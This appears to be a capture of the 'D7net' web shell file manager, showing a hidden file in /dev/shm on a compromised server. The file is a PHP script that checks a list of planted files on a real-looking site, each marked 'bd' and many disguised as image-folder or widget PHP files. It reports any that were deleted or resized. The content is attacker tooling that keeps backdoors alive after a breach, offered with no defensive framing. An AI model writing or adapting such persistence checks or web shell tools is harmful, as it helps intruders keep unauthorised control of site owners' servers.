D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.rec
back
Copy
<?php $r = '/home/olsoruwm/olsonmhp.com'; $x = ["/nc_assets/img/icons/fields.php"=>"bd@@389757@@597", "/nc_assets/img/logos/google_analytics.php"=>"bd@@389759@@902", "/bnspeow/ybgnjt1/tirf1bz/masterRegist.php"=>"bd@@383262@@591", "/hpx1sfq/cmfyxja/fhkyzda/about.php"=>"bd@@396041@@62", "/bqjahip/zxvwbq1/kjghlnv/Widget.php"=>"bd@@396061@@12", "/nc_assets/img/icons/fields.php"=>"bd@@396066@@68", "/wtvnkgf/nktswdm/pnhwjbk/cma_enditemearly.php"=>"bd@@396075@@12", "/nc_assets/img/pictograms/150/Artwork.php"=>"bd@@396085@@649", "/nc_assets/img/featured/600/cma_m_prefs.php"=>"bd@@396086@@837", "/oefsq1k/cjd1nhm/rhbvalt/company.php"=>"bd@@396089@@626", "/nc_assets/img/pictograms/affiliate_clicks.php"=>"bd@@396091@@988", "/1uxbocm/ovfitqw/y1gruzl/tax_rates.php"=>"bd@@396092@@1021", "/wtvnkgf/nktswdm/pnhwjbk/cma_enditemearly.php"=>"bd@@389739@@952", "/hpx1sfq/cmfyxja/fhkyzda/about.php"=>"bd@@383261@@875", "/nc_assets/img/featured/movabletypeapi.php"=>"bd@@389751@@612", "/bqjahip/zxvwbq1/kjghlnv/Widget.php"=>"bd@@389764@@936"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');